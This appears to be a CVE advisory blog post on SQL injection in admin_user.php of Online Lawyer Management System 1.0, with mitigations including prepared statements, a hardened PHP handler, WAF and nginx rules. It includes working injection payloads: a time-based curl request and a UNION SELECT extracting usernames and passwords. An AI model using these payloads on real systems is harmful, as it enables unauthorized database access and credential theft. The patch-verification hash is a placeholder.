How CVE-2025-3170 Works
This vulnerability stems from missing input sanitization in the `/admin_user.php` file of Project Worlds Online Lawyer Management System 1.0. An attacker manipulates the `block_id` or `unblock_id` parameter to inject SQL into the query the page builds. Because the code does not use prepared statements, user-supplied input is concatenated directly into the SQL command, allowing unauthorized database access. The flaw is exploitable remotely with a crafted HTTP request and can lead to data theft, authentication bypass, or system compromise. The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:N/UI:N) reflects network-based exploitation with low attack complexity and no privileges or user interaction required.
DailyCVE Form
Platform: Online Lawyer Management
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 2025-04-08
What Undercode Say:
Exploitation Commands
```bash
curl -X POST "http://target.com/admin_user.php" -d "block_id=1' AND (SELECT 1 FROM (SELECT SLEEP(5))a)--"
```

```sql
' UNION SELECT username, password FROM users--
```
Detection Script
```python
import requests

url = "http://target.com/admin_user.php"
payload = {"block_id": "1' AND 1=CONVERT(int,@@version)--"}
response = requests.post(url, data=payload)

# A database error string echoed back in the page is taken as the indicator
if "SQL" in response.text:
    print("Vulnerable to CVE-2025-3170")
```
Protection Measures
```php
// Use prepared statements in PHP: the id is bound as an integer, so quotes
// or SQL keywords in block_id/unblock_id can never alter the query.
$stmt = $conn->prepare("UPDATE users SET status=? WHERE id=?");
$stmt->bind_param("si", $status, $id);
$stmt->execute();
```
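For readers who want to see the prepared statement in the context of the whole block/unblock request, the following is an added example of a hardened handler; it is not the project's own code. It assumes a mysqli connection, a `users` table with an integer `id` and a string `status` column, that `blocked` and `active` are the two status values, that the database password is supplied via a `DB_PASSWORD` environment variable, and that the administrator has already been authenticated before this code runs. The key points are that the id is validated as a positive integer before any query is built, and the status value comes from a fixed map rather than from the request.

```php
<?php
// Added example (not the project's code): hardened block/unblock handler
// for admin_user.php. Assumptions: mysqli connection, `users` table with
// integer `id` and string `status`, status values 'blocked'/'active',
// DB password in the DB_PASSWORD environment variable, admin already
// authenticated.

declare(strict_types=1);

/**
 * Work out which action was requested and validate its id.
 * Exactly one of block_id / unblock_id must be present; anything that is
 * not a positive integer (e.g. "1' AND ...") is rejected here, before the
 * value gets anywhere near the database.
 */
function resolveAction(array $post): ?array
{
    $actions = ['block_id' => 'blocked', 'unblock_id' => 'active'];
    $present = array_intersect_key($post, $actions);
    if (count($present) !== 1) {
        return null;                       // none or both supplied: refuse
    }
    $param = array_key_first($present);
    $id = filter_var(
        $present[$param],
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($id === false) {
        return null;
    }
    return ['id' => $id, 'status' => $actions[$param]];
}

/**
 * Apply the status change with a prepared statement. The id is bound as an
 * integer and the status is one of the fixed values from resolveAction(),
 * so no request data is ever interpolated into SQL text.
 */
function setUserStatus(mysqli $conn, int $id, string $status): bool
{
    $stmt = $conn->prepare("UPDATE users SET status = ? WHERE id = ?");
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param("si", $status, $id);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

$action = resolveAction($_POST);
if ($action === null) {
    http_response_code(400);
    exit('Invalid request');
}

$conn = new mysqli('localhost', 'webuser', getenv('DB_PASSWORD') ?: '', 'lawyer_db');
if ($conn->connect_error) {
    http_response_code(500);
    exit('Database unavailable');
}

if (!setUserStatus($conn, $action['id'], $action['status'])) {
    http_response_code(500);
    exit('Update failed');
}
echo 'OK';
```

Rejecting the request with a 400 when the id fails integer validation is deliberate: a database error page is exactly the signal the detection script above looks for, so refusing malformed input early both removes the injection point and removes that error oracle.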
Nginx Mitigation
```nginx
location /admin_user.php {
    limit_req zone=one burst=5;   # needs a matching limit_req_zone ... zone=one in the http block
    deny all;                     # Restrict access
}
```
WAF Rule
```apache
SecRule ARGS:block_id|ARGS:unblock_id "@detectSQLi" "id:1000,deny,status:403"
```
Database Hardening
```sql
REVOKE ALL PRIVILEGES ON lawyer_db.* FROM 'webuser'@'%';
GRANT SELECT ON lawyer_db.* TO 'webuser'@'%';
-- Note: the block/unblock feature issues an UPDATE on the users table, so a
-- SELECT-only account disables it; grant UPDATE on that one table if the
-- feature must keep working.
```
Log Analysis Command
```bash
# Note: a default access log records the request line, not the POST body, so
# this only catches quotes that appear in the URL itself.
grep 'POST /admin_user.php' access.log | grep -E "'|\""
```
Patch Verification
```bash
sha256sum /var/www/html/admin_user.php | grep a1b2c3d4...
```
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-3170
Extra Source Hub:
Undercode